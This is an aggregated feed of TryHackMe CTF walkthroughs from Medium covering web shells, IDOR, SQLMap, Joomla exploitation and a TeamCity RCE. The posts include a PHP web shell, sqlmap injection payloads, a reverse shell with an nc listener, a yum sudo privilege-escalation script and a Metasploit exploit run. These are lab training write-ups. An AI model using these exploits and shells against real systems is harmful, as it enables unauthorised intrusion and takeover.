In his walkthrough of the Brim Room on TryHackMe, we look at Brim, yet another pcap analysis tool. Its primary focus is providing search and analytics.

<div><p><a href="https://rahulk2903.medium.com/burp-suite-the-basics-tryhackme-walkthrough-8cbe6c606a9f?source=rss------cybersecurity-5"><img src="https://cdn-images-1.medium.com/max/1132/0*q63VW4t_c2zojrI_.png" width="1132" alt="0*q63VW4t_c2zojrI_.png"></a></p><p>An introduction to using Burp Suite for Web Application pentesting</p><p><a href="https://rahulk2903.medium.com/burp-suite-the-basics-tryhackme-walkthrough-8cbe6c606a9f?source=rss------cybersecurity-5">Continue reading on Medium »</a></p></div>

Explore the Cyber Kill Chain by Lockheed Martin.

Origin

Introduction In the TryHackMe Infinity Shell room, I tackled a web application forensics challenge focused on detecting a malicious PHP web shell on a CMS site. This walkthrough covers discovering the shell, decoding Base64 commands, and extracting the CTF flag , while demonstrating how attackers hide files in directories like img/ or uploads/ for remote code execution. Perfect for beginners learning web security or CTF enthusiasts sharpening forensic skills. Identifying the Web Application &amp; Finding the Malicious Web Shell I started this challenge by looking for a web application on the box — the usual first step in web application forensics and TryHackMe CTFs. From the web root I found a CMS project that looked promising: cd /var/www/html/ ls Seeing CMSsite-master told me this was a CMS-based site (common attack surface), so I dove into that directory. cd CMSsite-master ls -la Hunting for suspicious files Attackers commonly hide web shells in places that look innocuous — img/, uploads/, includes/, etc. I listed the img/ directory and found a tiny images.php file next to normal image files: cd img/ ls -la When I examined images.php it was immediately suspicious: cat images.php &lt;?php system(base64_decode($_GET['query'])); ?&gt; This single line is a classic web shell pattern: it accepts base64-encoded commands via a query parameter and executes them on the server. That’s the attacker’s entry point — a direct remote command execution vector. At this point I knew I had to trace how the shell was used and what commands the attacker ran. Extracting web shell usage from Apache logs I filtered the Apache access logs for requests to images.php to get a clear timeline of what the attacker ran through the web shell. Instead of reading every line by hand, I searched for requests containing images.php? and pulled the Base64 payloads that were passed in the query parameter. That gave me a concise list of encoded commands to decode and analyse. cd /var/log/apache2/ cat other_vhosts_access.log.1 | grep -r 'images.php?' The Apache logs contained several GET requests targeting images.php, each passing Base64-encoded commands in the query parameter. GET /CMSsite-master/img/images.php?query=ZWNobyAnVEhNe3...ScK HTTP/1.1 Decoding the commands I decoded each Base64 string to reveal the actual shell commands the attacker executed. Here are the results: d2hvYW1pCg== bHMK ZWNobyAnVEhNe3N1cDNyXzM0c3lfdzNic2gzbGx9Jwo= aWZjb25maWcK Y2F0IC9ldGMvcGFzc3dkCg== aWQK What is the flag? THM{sup3r_34sy_w3bsh3ll} Conclusion The Infinity Shell room on TryHackMe provided a hands-on experience in web application forensics and web shell analysis . By carefully inspecting the CMS directories, identifying the malicious images.php web shell, and decoding Base64 commands from Apache logs, I was able to reconstruct the attacker’s actions and retrieve the CTF flag: THM{sup3r_34sy_w3bsh3ll} . This challenge highlights the importance of monitoring web directories for suspicious files, analyzing server logs for unusual activity, and understanding how attackers leverage hidden web shells for remote code execution . Whether you are new to CTFs or looking to sharpen your web forensics and penetration testing skills , this room reinforces critical skills for identifying and mitigating web-based attacks. TryHackMe Infinity Shell Walkthrough: Web Shell Forensics &amp; CTF Guide was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

<div><p><a href="https://medium.com/@rahulk2903/how-website-work-tryhackme-walkthrough-fbbc330a3b33?source=rss------cybersecurity-5"><img src="https://cdn-images-1.medium.com/max/986/1*7LaBeq-uxkfTvEd4L4chWw.png" width="986" alt="1*7LaBeq-uxkfTvEd4L4chWw.png"></a></p><p>To exploit a website, you first need to know how they are created.</p><p><a href="https://medium.com/@rahulk2903/how-website-work-tryhackme-walkthrough-fbbc330a3b33?source=rss------cybersecurity-5">Continue reading on Medium »</a></p></div>

I’m all atomic inside!

Enjoy the videos and music that you love, upload original content and share it all with friends, family and the world on YouTube.

This beginner-to-intermediate level guide provides hands-on experience with Wireshark’s core features.

IDOR — TryHackMe Walkthrough In this room, you’re going to learn what an IDOR vulnerability is, what they look like, how to find them and a practical task exploiting a real case scenario. Lab Access: https://tryhackme.com/room/idor Task 1 : What is an IDOR? IDOR stands for Insecure Direct Object Reference and is a type of access control vulnerability. This type of vulnerability can occur when a web server receives user-supplied input to retrieve objects (files, data, documents), too much trust has been placed on the input data, and it is not validated on the server-side to confirm the requested object belongs to the user requesting it. [Question 1.1] What does IDOR stand for? Answer: Insecure Direct Object Reference Task 2 : An IDOR Example Imagine you’ve just signed up for an online service, and you want to change your profile information. The link you click on goes to http://online-service.thm/profile?user_id=1305, and you can see your information. Curiosity gets the better of you, and you try changing the user_id value to 1000 instead (http://online-service.thm/profile?user_id=1000), and to your surprise, you can now see another user’s information. You’ve now discovered an IDOR vulnerability! Ideally, there should be a check on the website to confirm that the user information belongs to the user logged requesting it. Using what you’ve learnt above, click on the View Site button and try and receive a flag by discovering and exploiting an IDOR vulnerability. [Question 2.1] What is the Flag from the IDOR example website? Answer: THM{IDOR-VULN-FOUND} Task 3 : Finding IDORS in Encoded IDs Encoded IDs When passing data from page to page either by post data, query strings, or cookies, web developers will often first take the raw data and encode it. Encoding ensures that the receiving web server will be able to understand the contents. Encoding changes binary data into an ASCII string commonly using the a-z, A-Z, 0-9 and = character for padding. The most common encoding technique on the web is base64 encoding and can usually be pretty easy to spot. You can use websites like https://www.base64decode.org/ to decode the string, then edit the data and re-encode it again using https://www.base64encode.org/ and then resubmit the web request to see if there is a change in the response. [Question 3.1] What is a common type of encoding used by websites? Answer: Base64 Task 4 : Finding IDORS in Hashed IDs Hashed IDs Hashed IDs are a little bit more complicated to deal with than encoded ones, but they may follow a predictable pattern, such as being the hashed version of the integer value. For example, the Id number 123 would become 202cb962ac59075b964b07152d234b70 if md5 hashing were in use. It’s worthwhile putting any discovered hashes through a web service such as https://crackstation.net/ (which has a database of billions of hash to value results) to see if we can find any matches. [Question 4.1] What is a common algorithm used for hashing IDs? Answer: md5 Task 5 : Finding IDORS in Unpredictable IDs Unpredictable IDs If the Id cannot be detected using the above methods, an excellent method of IDOR detection is to create two accounts and swap the Id numbers between them. If you can view the other users’ content using their Id number while still being logged in with a different account (or not logged in at all), you’ve found a valid IDOR vulnerability. [Question 5.1] What is the minimum number of accounts you need to create to check for IDORs between accounts? Answer: 2 Task 6 : Where are IDORS located? Where are they located? The vulnerable endpoint you’re targeting may not always be something you see in the address bar. It could be content your browser loads in via an AJAX request or something that you find referenced in a JavaScript file. Sometimes endpoints could have an unreferenced parameter that may have been of some use during development and got pushed to production. For example, you may notice a call to /user/details displaying your user information (authenticated through your session). But through an attack known as parameter mining, you discover a parameter called user_id that you can use to display other users’ information, for example, /user/details?user_id=123 . Potential located areas: Address Bar An AJAX request loads content into your browser. Something that is written in a JavaScript file An unreferenced parameter that may have been useful during testing but was pushed to production [Question 6.1] Read the above. Task 7 : A Practical IDOR Example https://10-10-15-165.p.thmlabs.com irstly you’ll need to log in. To do this, click on the customer’s section and create an account. Once logged in, click on the Your Account  tab. The Your Account section gives you the ability to change your information such as username, email address and password. You’ll notice the username and email fields pre-filled in with your information. We’ll start by investigating how this information gets pre-filled. If you open your browser developer tools, select the network tab and then refresh the page, you’ll see a call to an endpoint with the path /api/v1/customer?id={user_id}. This page returns in JSON format your user id, username and email address. We can see from the path that the user information shown is taken from the query string’s id parameter (see below image). First off — Set up an account to simulate having a customer account with “Acme IT Support.” Next — Go to “Your Account” and observe that all of the information has already been provided beforehand, which is something to take note of because it makes us curious how and what mechanism has provided all of this information. Then, if you’re using Firefox, “Right Click” and select “Inspect.” Go to the “Network” section and you’ll discover that it’s empty because it is required to be refreshed in order to retrieve the information.After refreshing the page, all of this information will appear, and it is useful to understand how all of this information is retrieved by looking at the “File” column.Having discovered that “ customer/?id=51 ” appears to be the one we are looking for, and by hovering the cursor over it, we will be able to read the complete string of it in order to understand what the endpoint actually and so on Now that we’ve seen this, we can open in a new tab [Question 7.1] What is the username for user id 1? Change the value of the new request to “1,” and that the results of the username and email have been altered. Answer: adam84 [Question 7.2] What is the email address for user id 3? Again the the vaule into 3 and that the results of the username and email have been altered. Answer: j@fakemail.thm CONCLUSION The IDOR room is a great way to learn how ID numbers can be easily changed, leading to a serious security risk. Many companies and individuals may not even realize they are vulnerable to such attacks. Even though developers should have fixed this issue, human error can leave systems exposed, allowing attackers to exploit them. In reality, this is likely one of the common techniques attackers us Happy Hacking!🚀💻 IDOR — TryHackMe Walkthrough was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

SQLMap: The Basics [ Cyber Security 101 ] TryHackMe Writeup | Detailed Walkthrough | THM Premium Room | SuNnY Kudos To the Creators of this Room 😎 Room Type Only subscribers can deploy virtual machines in this room! Go to your profile page to subscribe (if you have not already). Do note : Premium Subscription is required to solve this room Let’s Start the Party This writeup is a part of TryHackMe’s Learning Path → Cyber Security 101 Check this Learning Path here → Cyber Security 101 Learning Path  &lt;&lt; Task 1 : Introduction It’s adviced to give this module a good read before proceeding to the Task 2. Let’s proceed to Task 2 Task 2 : SQL Injection Vulnerability Task 2 — Question 1 : Which boolean operator checks if at least one side of the operator is true for the condition to be true? The boolean operator that checks if at least one side of the condition is true for the entire condition to be true is the OR operator. In a SQL query, the OR operator ensures that if either the condition on the left side or the condition on the right side is true, the whole statement evaluates to  true . Task 2 — Question 2 : Is 1=1 in an SQL query always true? (YEA/NAY) The Answer is YEA , in an SQL query, 1=1 is always true. In SQL, the condition 1=1 is a logical expression that always evaluates to true because 1 is always equal to 1 . This is often used in SQL queries, particularly in SQL injection attacks, to bypass conditions or create queries that will always return results. Task 2 Complete ! Task 3 : Automated SQL Injection Tool Task 3 Question 1 : Which flag in the SQLMap tool is used to extract all the databases available? - -dbs Explanation: The --dbs flag in SQLMap is used to list all the databases present in the backend database management system (DBMS). After identifying an SQL injection vulnerability, this flag tells SQLMap to extract and display all the available database names. Once the database names are known, an attacker can further enumerate them to access sensitive information. Task 3 Question 2 : What would be the full command of SQLMap for extracting all tables from the “members” database? (Vulnerable URL: http://sqlmaptesting.thm/search/cat=1) sqlmap -u http://sqlmaptesting.thm/search/cat=1 -D members --tables Explanation: To extract all tables from a specific database using SQLMap, the -D flag is used to specify the database name, and the --tables flag is used to list all tables in that database. Task 3 Complete ! Task 4 : Practical Exercise This is a Practical Module , Let’s fire up the VM 🔥before proceeding ( Start Machine ) The Room recommends Starting AttackBox Finding the Target URL ( Quick Motion Based Solution ) Let’s Open the Browser and Navitage to this Page → http://10.10.249.16/ai/login 2. We are greeted with a Login Page as shown above👆🏾 3. Right-click on the page and select Inspect (or press Ctrl + Shift + I / Cmd + Option + I on Mac). 4. In the developer tools, navigate to the Network  tab. 5. To Capture the GET request from the Browser , Let’s Use test as Username and test as Password → test:test ( This is also used and demonstrated in the Module of this room ) 6. Then Refresh the Network Tab and We will get the GET Request 7. We can Copy this URL to solve further Questions in this Task Steps Performed in a Video Snippet → So we have our Target URI with us → http://10.10.249.16/ai/includes/user_login?email=test&amp;password=test Do Note → Your IP can be different than the IP i have got in this Room Just replace the IP holder with yours Let’s now Answer the Questions → Task 4 Question 1 : How many databases are available in this web application? Using our target URL let’s find the answer By Running the SQLMap command to list all the databases using the --dbs flag. The output will show the number of databases available in the application. sqlmap -u “ http://10.10.249.16/ai/includes/user_login?email=test&amp;password=test ” --dbs -level=5 sqlmap -u "http://10.10.249.16/ai/includes/user_login?email=test&amp;password=test" --dbs -level=5 Note → Don’t forget to wrap the URL inside “ ” other wise the flag --dbs gets ignored and an error is returned After executing the command, SQLMap will output a list of databases. The correct answer can be inferred from this output. Now the Motion Graphics Image with Command and result → Answer is 6 available databases [6]: [*] ai [*] information_schema [*] mysql [*] performance_schema [*] phpmyadmin [*] test Task 4 — Question 2 : What is the name of the table available in the “ai” database? Using the same Target URI we are going to solve this question → After identifying the available databases, use the SQLMap command with the -D ai --tables flags to fetch the tables from the "ai" database. sqlmap -u “ http://10.10.249.16/ai/includes/user_login?email=test&amp;password=test ” -D ai --tables -level=5 sqlmap -u "http://10.10.249.16/ai/includes/user_login?email=test&amp;password=test" -D ai --tables -level=5 Note → Again , Don’t forget to wrap the URL inside “ ” SQLMap will list the tables in the specified database → Now with the Motion Graphics → Answer to Task 4 Question 2 is → Users Task 4 Question 3 : What is the password of the email test@chatai.com? Using the same Target URI as the above questions we are going to solve this final question as well ! After you know the table name (in this case, “user”), use the SQLMap command to dump the records from that table, specifying the database and table. The output will contain the records in the table, including the password for test@chatai.com. Look for the entry associated with this email to find the corresponding password. sqlmap -u "http://10.10.249.16/ai/includes/user_login?email=test&amp;password=test" -D ai -T user --dump -level=5 Note → Again as always , Don’t forget to wrap the URL inside “ ” to avoid errors Now with the Motion Graphics to understand better → Task 4 and the Room =&gt; Done ! Congrats ! We have now solved all the tasks of this room ! Hope you have enjoyed solving this room as much i did if you want to get the latest Try Hack Me writeups delivered , go ahead and follow me on Medium and also hit the notify via email Let’s Connect on Linkedin → https://linkedin.com/in/sunnysinghverma You can also add me Respect on — Hack The Box if you want i would really appreciate it :) https://app.hackthebox.com/users/1585635 My TryHackMe Profile Page → https://tryhackme.com/p/SuNnY if you did you can add a clap to this article to let me know and if you loved this article you can click clap icon upto 50 times to let me know and that will make my day 🤗 You can also follow me on medium to get more articles about CTFs and Cybersecurity in the near Future but don’t forget to hit that email notification icon right next to the follow me button Thank you ! SuNnY SQLMap: The Basics [ Cyber Security 101 ] TryHackMe Writeup | Detailed Walkthrough | THM Premium… was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

Daily Bugle — TryHackMe Walkthrough (Joomla Exploitation &amp; Privilege Escalation Guide) Introduction The Daily Bugle room on TryHackMe plunges you into a thrilling Red Team scenario centered around a high-profile bank heist. Your mission is to investigate and uncover the culprits while navigating a mix of web and system challenges. This room combines Joomla web exploitation, SQL injection, and Red Hat Linux privilege escalation, providing a full-spectrum test of both web application and server-level hacking skills. It’s a perfect exercise for penetration testers looking to sharpen their reconnaissance, exploitation, and privilege escalation techniques in a realistic, hands-on environment. Initial reconnaissance I started the box with a standard port and service scan to get my bearings. nmap -sV -sC &lt;ip&gt; Nmap returned three open ports: 22/tcp — SSH (OpenSSH 7.4) 80/tcp — HTTP (Apache/2.4.6, PHP 5.6.40) — the web server identified itself as  Joomla! . 3306/tcp — MySQL / MariaDB (unauthorized) Port 80 was open, so I navigated to the web server to see what was exposed. Question: Access the web server, who robbed the bank? Answer: spiderman Web enumeration Next, I ran a directory brute-force with dirsearch to map out potential Joomla paths and locate an admin panel. dirsearch -u &lt;ip&gt; -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt Output highlights showed multiple Joomla-related directories and, importantly, an administrator interface: /images/, /media/, /templates/, /modules/, /plugins/, /includes/, /language/, /components/, /cache/, /libraries/, /tmp/, /layouts/, /cli/ /administrator/  — Joomla admin panel discovered Let’s navigate to the administrator panel next. Finding Joomla Version While dirsearch was running I noticed a README.txt file and grabbed it with curl to see if it revealed anything useful. curl -s http://&lt;ip&gt;/README.txt It confirmed the site was running Joomla 3.7.0 , which is useful for targeting known vulnerabilities. Question: What is the Joomla version? Answer:  3.7.0 This is a useful data point: older Joomla 3.7.x installs are known to have several vulnerabilities, so next I moved on to vulnerability research. Vulnerability research — SQL Injection A known SQL injection ( Exploit-DB 42033 ) affects Joomla 3.7’s com_fields component via the list[fullordering] parameter. I used sqlmap to verify the vulnerability and enumerate databases: sqlmap -u "http://10.201.99.224/index.php?option=com_fields&amp;view=fields&amp;layout=modal&amp;list[fullordering]=updatexml" \ --risk=3 --level=5 --random-agent --dbs -p list[fullordering] Output: sqlmap identified the following injection point(s) with a total of 2547 HTTP(s) requests: --- Parameter: list[fullordering] (GET) Type: error-based Title: MySQL &gt;= 5.0 error-based - Parameter replace (FLOOR) Payload: option=com_fields&amp;view=fields&amp;layout=modal&amp;list[fullordering]=(SELECT 3813 FROM(SELECT COUNT(*),CONCAT(0x7162767671,(SELECT (ELT(3813=3813,1))),0x716b767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: time-based blind Title: MySQL &gt;= 5.0.12 time-based blind - Parameter replace (substraction) Payload: option=com_fields&amp;view=fields&amp;layout=modal&amp;list[fullordering]=(SELECT 7977 FROM (SELECT(SLEEP(5)))ODsF) --- [09:31:02] [INFO] the back-end DBMS is MySQL [09:31:02] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s) back-end DBMS: MySQL &gt;= 5.0 (MariaDB fork) [09:31:03] [INFO] fetching database names [09:31:03] [INFO] retrieved: 'information_schema' [09:31:03] [INFO] retrieved: 'joomla' [09:31:03] [INFO] retrieved: 'mysql' [09:31:03] [INFO] retrieved: 'performance_schema' [09:31:04] [INFO] retrieved: 'test' available databases [5]: [*] information_schema [*] joomla [*] mysql [*] performance_schema [*] test [09:31:04] [WARNING] HTTP error codes detected during run: 500 (Internal Server Error) - 2507 times [09:31:04] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.201.99.224' [09:31:04] [WARNING] you haven't updated sqlmap for more than 1997 days!!! [*] ending @ 09:31:04 /2025-09-21/ sqlmap confirmed the parameter was vulnerable and retrieved the following databases: information_schema joomla mysql performance_schema test The backend DBMS is MySQL (MariaDB fork). Many HTTP 500 responses appeared — typical for error-based payloads — and results were logged for further use. Exploit &amp; admin hash extraction I found an existing Joomla exploit and downloaded it: wget https://raw.githubusercontent.com/stefanlucas/Exploit-Joomla/master/joomblah.py python joomblah.py http://10.201.99.224/ This revealed Jonah’s password hash: $2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm I cracked it with John the Ripper using the RockYou wordlist: john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt Question: What is Jonah's cracked password? Answer: spiderman123 Gaining Access — Joomla Admin &amp; Reverse Shell I logged in to the Joomla admin panel using Jonah’s credentials (jonah:spiderman123) via the /administrator directory. Once inside, I navigated to Extensions &gt; Templates &gt; Templates and selected the Beez3 template. To get a reverse shell, I cloned the PentestMonkey PHP reverse shell repository: git clone https://github.com/pentestmonkey/php-reverse-shell.git cd php-reverse-shell I started a listener on my machine: nc -lnvp 1234 Then I opened index.php in the Beez3 template, replaced its content with the PHP reverse shell (configured with my IP and port), and saved it. Browsing to the modified template triggered the reverse shell: curl http://10.201.99.224/templates/beez3/index.php And my listener received the connection: ~$ nc -lnvp 1234 Connection received on 10.201.99.224 43182 sh-4.2$ I was now on the server as the apache user. Post-Exploitation First, I listed /home to see which users existed. The only user present was jjameson, but I didn’t have permission to access their home directory, so user.txt couldn’t be read at this stage. Next, I inspected the web directory: cd /var/www/html cat configuration.php The Joomla configuration.php file revealed database credentials: public $user = 'root'; public $password = 'nv5uz9r3ZEDzVjNu'; public $db = 'joomla'; public $dbprefix = 'fb9j5_'; Capturing the User Flag Interestingly, the database password (nv5uz9r3ZEDzVjNu) also worked for the user jjameson. I logged in via SSH: ssh jjameson@10.201.99.224 Password: nv5uz9r3ZEDzVjNu Once inside, I retrieved the user flag: cat user.txt 27a260fe3cba712cfdedb1c86d80442e The machine is a Red Hat-based system . Post-Exploitation — Privilege Escalation I checked sudo privileges: sudo -l Output revealed that jjameson can run yum as root without a password: (ALL) NOPASSWD: /usr/bin/yum I verified the OS version: cat /etc/redhat-release CentOS Linux release 7.7.1908 (Core) Using GTFOBins , I found that jjameson could run yum with NOPASSWD , which allowed me to escalate privileges. I pasted the following code directly into the terminal: TF=$(mktemp -d) cat &gt;$TF/x&lt;&lt;EOF [main] plugins=1 pluginpath=$TF pluginconfpath=$TF EOF cat &gt;$TF/y.conf&lt;&lt;EOF [main] enabled=1 EOF cat &gt;$TF/y.py&lt;&lt;EOF import os import yum from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE requires_api_version='2.1' def init_hook(conduit): os.execl('/bin/sh','/bin/sh') EOF sudo yum -c $TF/x --enableplugin=y This gave me a root shell . Capturing the Root Flag Finally, I read the root flag: cat /root/root.txt eec3d53292b1821868266858d7fa6f79 Conclusion The Daily Bugle room on TryHackMe was a challenging Red Team exercise that tested both web and system exploitation skills. From Joomla vulnerabilities and SQL injection to deploying a PHP reverse shell and escalating privileges on Red Hat Linux via GTFOBins, I successfully captured both user and root flags. This room highlights the importance of thorough enumeration, vulnerability research, and creative privilege escalation — an excellent challenge for anyone honing penetration testing skills. Daily Bugle — TryHackMe Walkthrough: Joomla Exploitation &amp; Red Hat Privilege Escalation was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

Welcome to this walkthrough of the SOC Role in Blue Team Room on TryHackMe. In this room we discuss the different kinds of roles in a SOC team, and how one

It came without buffering! It came without lag! Continue reading on InfoSec Write-ups »

<div><p><a href="https://medium.com/@rahulk2903/dns-tryhackme-walkthrough-4b283523a4c2?source=rss------cybersecurity-5"><img src="https://cdn-images-1.medium.com/max/960/1*58CyaDSlwo_MCoCrGvyOvg.png" width="960" alt="1*58CyaDSlwo_MCoCrGvyOvg.png"></a></p><p>Learn how DNS works and how it helps you access internet services.</p><p><a href="https://medium.com/@rahulk2903/dns-tryhackme-walkthrough-4b283523a4c2?source=rss------cybersecurity-5">Continue reading on Medium »</a></p></div>

Brains — TryHackMe Walkthrough The city forgot to close its gate. Introduction The Brains room on TryHackMe challenges you to exploit a TeamCity 2023.11.3 server ( CVE‑2024‑27198 ) to gain a shell, capture the user flag, and perform forensic analysis using Splunk to find backdoor users, malicious packages, and uploaded plugins. Task 1 Red: Exploit the Server! Reconnaissance I started with an aggressive Nmap scan to enumerate services and versions: nmap -sV -sC -A &lt;ip&gt; Important findings from the scan: 22/tcp — ssh  — OpenSSH 8.2p1 (Ubuntu) 80/tcp — http  — Apache/2.4.41 (Ubuntu) — page title: Maintenance . 50000/tcp — HTTP service  — returned TeamCity maintenance HTML and headers (appears to be TeamCity ). Web enumeration I navigated to the web server on port 80 first and saw a simple maintenance page. That didn’t reveal much immediately beyond the server header and that the site was intentionally showing maintenance. Visiting 50000 revealed a TeamCity management interface with an accessible login/maintenance page. Vulnerability reconnaissance I confirmed the TeamCity login shows 2023.11.3 , and Rapid7’s analysis of CVE‑2024‑27198 (authentication‑bypass → unauthenticated RCE) matches what I found — Rapid7 documents exploit details and remediation. ( Rapid7 ) Exploitation I launched Metasploit and used the TeamCity RCE module, configured a reverse handler, and ran the exploit: msfconsole -q use exploit/multi/http/jetbrains_teamcity_rce_cve_2024_27198 set LHOST tun0 set LPORT 53 set RHOST &lt;ip&gt; set RPORT 50000 run Metasploit identified the target as vulnerable and created an auth token, uploaded the malicious plugin, and delivered the payload. The module opened a meterpreter session: [+] The target is vulnerable. JetBrains TeamCity 2023.11.3 (build 147512) running on Linux. [*] Created authentication token: eyJ0eXAiOiAiVENWMiJ9... [*] Uploading plugin: YAgxHifR [*] Sending stage (58073 bytes) to 10.201.28.176 [*] Deleting the plugin... [+] Deleted /opt/teamcity/TeamCity/work/Catalina/localhost/ROOT/TC_147512_YAgxHifR [+] Deleted /home/ubuntu/.BuildServer/system/caches/plugins.unpacked/YAgxHifR [*] Meterpreter session 1 opened (10.17.30.120:53 -&gt; 10.201.28.176:55558) Important: the exploit used LPORT=53, so I had to stop my local DNS/service using port 53 (e.g., systemd-resolved/named) first to free the port. Capturing the user flag After getting the meterpreter shell, I listed files and read the user flag: meterpreter &gt; cat flag.txt THM{faa9bac345709b6620a6200b484c7594} Task 2 Blue: Let’s Investigate After exploiting the box I switched to the Blue/Forensics side of the lab to investigate what the attacker left behind. I deployed the Splunk machine and waited a few minutes for the instance to come up. Splunk URL: http://MACHINE_IP:8000 Credentials: Username: splunk —  Password: analyst123 After logging in I landed on the Splunk Enterprise dashboard. I navigated to Search &amp; Reporting to start looking through collected logs. From the Search app I opened Data Summary and filtered by source . I selected /var/log/auth.log to focus on authentication events. The auth log is the right place to look for useradd events and other account activity. To find account creation events I ran a simple search over the auth log: source="/var/log/auth.log" useradd "new user" Then I expanded the time picker from the default (last 24 hours) to All time so I wouldn’t miss older events. The search returned a user creation entry showing the attacker created a backdoor account named eviluser . Question: What is the name of the backdoor user which was created on the server after exploitation? Answer: eviluser Installed package To find packages installed around the same time the backdoor account was created I searched the dpkg log in Splunk. I ran: source="/var/log/dpkg.log" date_month="july" date_mday="4" *install* I expanded the time picker to All time and filtered to the host we were investigating. Question: What is the name of the malicious-looking package installed on the server? Answer: datacollector Plugin upload To identify the plugin the attacker uploaded during exploitation I searched TeamCity activity logs in Splunk with: source="/opt/teamcity/TeamCity/logs/teamcity-activities.log" *plugin* I set the time range to All time and filtered the host. The logs revealed the uploaded plugin YAgxHifR and its actions, matching the Metasploit output. Question: What is the name of the plugin installed on the server after successful exploitation? Answer: AyzzbuXY.zip Conclusion The Brains room on TryHackMe offered a complete journey from offensive exploitation to forensic analysis . I successfully exploited a vulnerable TeamCity 2023.11.3 instance (CVE‑2024‑27198) to gain a meterpreter shell, captured the user flag, and then shifted to Blue Team tasks to investigate the attacker’s footprints. Using Splunk , I identified the backdoor user, malicious package, and uploaded plugin, gaining hands-on experience in post-exploitation analysis and log investigation . This room is perfect for anyone looking to practice real-world web app exploits, RCE techniques, and forensic log analysis . Following this walkthrough, you should feel confident combining offensive and defensive skills to both compromise and analyze systems safely. Brains —  TryHackMe Walkthrough was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.